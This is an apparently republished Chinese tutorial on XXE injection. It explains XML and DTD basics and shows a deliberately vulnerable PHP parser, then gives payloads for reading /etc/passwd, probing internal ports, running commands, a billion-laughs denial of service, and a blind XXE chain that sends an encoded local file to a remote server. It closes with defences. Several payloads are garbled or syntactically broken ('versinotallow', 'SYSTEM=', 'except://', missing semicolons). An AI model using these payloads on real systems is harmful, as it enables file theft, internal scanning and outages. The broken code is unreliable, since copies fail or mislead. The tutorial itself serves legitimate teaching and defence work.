Web漏洞-XXE漏洞(详细)

XXE漏洞

XXE全称为XML External Entity Injection即XMl外部实体注入漏洞

原理：

XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致用户可以控制外部的加载文件，造成XXE漏洞。

XXE漏洞触发点往往是可以上传xml文件的位置，没有对xml文件进行过滤，导致可加载恶意外部文件和代码，造成任意文件读取，命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害

基础知识：

XML用于标记电子文件使其具有结构性的标记语言，可以标记数据，定义数据类型，允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明，DTD文档类型定义、文档元素。

DTD的作用是定义XML文档的合法构造模块，可以在内部声明，也可以外部引用

xml文档的构建模块

所有的 XML 文档（以及 HTML 文档）均由以下简单的构建模块构成：

元素

属性

实体

PCDATA

CDATA

扫描二维码关注公众号，回复： 17346224 查看本文章

元素约束

格式：<!ELEMENT name content-type>

ELEMENT 表示关键字

NAME 表示元素名称

content-type 表示元素类型，有三种写法：

EMPTY 表示该元素不能包含子元素和文本，但可以有属性

ANY 表示该元素可以包含任何在该DTD中定义的元素内容

#PCDATA 表示可以包含任何字符数据，但是不能在其中包含任何子元素,被解析的字符数据，PCDATA是会被解析器解析的文本

属性约束

格式：<!ATTLIST 元素名属性名称属性类型属性特点>

属性类型：

CDATA 是字符串类型,不会被解析器解析的文本，在这些文本中的标签不会被当作标记来对待，其中的实体也不会被展开

ID 在整个文档中是唯一的，命名规则和xml元素一样，不能以数字开头

IDREF reference属性的值必须来源于ID的值

IDREFS 值必须来源于ID的值，取值可以是多个，以空格分开书写

Enumerated 枚举类型（男|女）

ENTITY 实体

属性特点：

#REQUIRED 必须设置

#IMPLIED 可选

#FIXED value 固定值，属性可以不设定（该属性会自动设置上），如果设置，值必须为value

default value 默认值，可以自定义，如果不定义该属性，则属性会自动设置，值为默认值

语法规则：

xml 必须包含根元素，它是所有其他元素的父元素，比如以下实例中 root 就是根元素：

<?xml version="1.0" encoding="UTF-8"?> //文档开头必须
<root>
  <child>
    <subchild>.....</subchild>
  </child>
</root>

在 XML 中，省略关闭标签是非法的。所有元素都必须有关闭标签

XML 标签对大小写敏感。标签与标签是不同的。必须使用相同的大小写来编写打开标签和关闭标签

在 XML 中，所有元素都必须彼此正确地嵌套

XML的注释同html

XML中空格会被保留，而HTML会把多个字符裁剪为一个

XML的标签可以自定义，就是说可以随便改

XML 的属性值必须加引号

XML实体

在 XML 中，一些字符拥有特殊的意义。

如果您把字符 “<” 放在 XML 元素中，会发生错误，这是因为解析器会把它当作新元素的开始。

实体是用于定义引用普通文本或特殊字符的快捷方式的变量

为了避免这个错误，需要实体引用来代替 “<” 字符：

在 XML 中，有 5 个预定义的实体引用
&lt;    <    小于
&gt;    >    大于
&amp;    &    &符
&apos;    '    单引
&quot;    "    双引

在 Windows 应用程序中，换行通常以一对字符来存储：回车符（CR）和换行符（LF）。

在 Unix 和 Mac OSX 中，使用 LF 来存储新行。在旧的 Mac 系统中，使用 CR 来存储新行。XML 以 LF 存储换行。

所有的XML文档都由五种简单的构建模块（元素，属性，实体，PCDATA CDATA）构成

DTD实体介绍：

DTD（文档类型定义）的作用是定义 XML 文档的合法构建模块。

DTD 的声明方式分为两种：内部 DTD 和外部 DTD ，其区别就在于：对 XML 文档中的元素、属性和实体的 DTD 的声明是在 XML 文档内部引用还是引用外部的 dtd 文件。

内部DTD

<?xml version="1.0"?> //声明xml版本
<!DOCTYPE note [   //声明此文档是note类型的文档
<!ELEMENT note (to,from,heading,body)>  //声明此文档的所有元素
<!ELEMENT to (#PCDATA)>  //定义to元素的类型为PCDATA
<!ELEMENT from (#PCDATA)>  // 定义from元素类型为PCDATA
<!ELEMENT heading (#PCDATA)> // 定义heading为PCDATA
<!ELEMENT body (#PCDATA)>  // 定义body为PCDATA
<!ENTITY writer "hello world"> // 定义一个内部实体
]>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend</body>
</note>

外部DTD

通用实体和参数实体：

1、通用实体

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY > #定义元素为ANY，即可以接受任何元素。
<!ENTITY xxe SYSTEM "file:///c:/test.dtd" >]> // 定义通用实体
<root>
<body>&xxe;</body> #定义一个外部实体
</root>

通过第 4 行的定义，第 7 行的 &xxe 就会对 c:/test.dtd 文件资源进行 SYSTEM 关键字的引用，这样对引用资源所做的任何更改都会在文档中自动更新。

另外除了上面 SYSTEM 关键字的引用方式，还有一种引用方式是使用 PUBLIC 引用公用 DTD 的方式，语法如

<!DOCTYPE 根元素名称 PUBLIC “DTD标识名” “公用DTD的URI”>

2、参数实体

<!ENTITY % an-element "<!ELEMENT mytag (subtag)>">
<!ENTITY % remote-dtd SYSTEM "http://somewhere.example.org/remote.dtd">
%an-element; %remote-dtd;

在上面的代码示例中，可以看到实体名前多了一个 “%” ，在参数实体中使用 “% 实体名” (这里面的空格不能少) 定义，并且只能在 DTD 中使用 “% 实体名” 引用。

判读是否存在XXE漏洞：

最直接的方法就是用burp抓包，然后，修改HTTP请求方法，修改Content-Type头部字段等等，查看返回包的响应，看看应用程序是否解析了发送的内容，一旦解析了，那么有可能XXE攻击漏洞

XML漏洞利用

file_get_contents函数读取了php://input传入的数据,但是传入的数据没有经过任何过滤,直接在loadXML函数中进行了调用并通过了echo函数输入$username的结果，这样就导致了XXE漏洞的产生。

<?php 
  libxml_disable_entity_loader(false);
$xmlfile=file_get_contents('php://input');
$dom=new DOMDocument();

$dom->loadXML($xmlfile,LIBXML_NOENT | LIBXML_DTDLOAD);
$creds=simplexml_import_dom($dom);
$username=$creds->username;
$password=$creds->password;

echo 'hello'.$username;

?>

1、文件读取

通过加载外部实体，利用file://、php://等伪协议读取本地文件

payload
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE creds[
<!ELEMENT userename ANY>
<!ELEMENT password ANY>
<!ENTITY xxe SYSTEM="file:///etc/passwd"]>
<creds>
  <username>&xxe</username>
  <password>test</password>
</creds>

2、内网探测

利用xxe漏洞进行内网探测，如果端口开启，请求返回的时间会很快，如果端口关闭请求返回的时间会很慢

探测22号端口是否开启

<?xml version="1.0"?>
<!DOCTYPE creds[
<!ELEMENT userename ANY>
<!ELEMENT password ANY>
<!ENTITY xxe SYSTEM="http://127.0.0.1.22"]>
<creds>
    <username>&xxe</username>
    <password>test</password>
</creds>

3、命令执行

利用xxe漏洞可以调用except://伪协议调用系统命令

<?xml version="1.0"?>
<!DOCTYPE creds[
<!ELEMENT userename ANY>
<!ELEMENT password ANY>
<!ENTITY xxe SYSTEM="except://id"]>
<creds>
    <username>&xxe</username>
    <password>test</password>
</creds>

4、DDOS攻击

<?xml version="1.0"?>
   <!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

这个的原理就是递归引用,lol 实体具体还有 "lol" 字符串，然后一个 lol2 实体引用了 10 次 lol 实体，一个 lol3 实体引用了 10 次 lol2 实体，此时一个 lol3 实体就含有 10^2 个 "lol" 了，以此类推，lol9 实体含有 10^8 个 "lol" 字符串,最后再引用lol9。构造恶意的XML实体文件耗尽可用内存，因为许多XML解析器在解析XML文档时倾向于将它的整个结构保留在内存中，解析非常慢，造成了拒绝服务器攻击。

XXE利用两大常见：有回显和无回显。有回显的情况可以直接在页面中看到payload的执行结果或现象，无回显的情况又称为blind xxe，可以使用外带数据通道提取数据

有回显：

直接外部实体声明

<?xml versinotallow="1.0"?>
        <!DOCTYPE ANY [
                <!ENTITY test SYSTEM "file:///etc/passwd">
        ]>
        <abc>&test;</abc>

引入外部dtd文档

通过外部dtd文档引入外部实体声明

<?xml versinotallow="1.0"?>
        <!DOCTYPE a SYSTEM "http://localhost/evil.dtd">
        <abc>&b;</abc>

evil.dtd内容：
<!ENTITY b SYSTEM "file:///etc/passwd">

通过外部实体引入dtd文档

通过外部实体声明引入外部实体声明

<?xml versinotallow="1.0"?>
        <!DOCTYPE a [
                <!ENTITY % d SYSTEM "http://localhost/evil.dtd">
        %d;
        ]>
        <abc>&b;</abc>

evil.dtd内容：
<!ENTITY b SYSTEM "file:///etc/passwd">

无回显：

利用参数实体：

<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://ip/test.dtd">
%remote;%int;%send;
]>

test.dtd：
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/test.txt">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip:9999?p=%file;'>">

调用过程：

连续调用了三个参数实体 %remote;%int;%send;，这就是我们的利用顺序，%remote 先调用，调用后请求远程服务器上的 test.dtd ，有点类似于将 test.dtd 包含进来，然后 %int 调用 test.dtd 中的 %file, %file 就会去获取服务器上面的敏感文件，然后将 %file 的结果填入到 %send 以后(因为实体的值中不能有 %, 所以将其转成html实体编码 %)，我们再调用 %send; 把我们的读取到的数据发送到我们的远程 vps 上，这样就实现了外带数据的效果，完美的解决了 XXE 无回显的问题。

防御方法：

禁用外部实体

php:
libxml_disable_entity_loader(true);

java:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

过滤和验证用户提交的XML数据

不允许XML中含有任何自己声明的DTD ,过滤关键字：<\!DOCTYPE和<\!ENTITY，或者SYSTEM和PUBLIC

有效的措施：配置XML parser只能使用静态DTD，禁止外来引入；对于Java来说，直接设置相应的属性值为false即可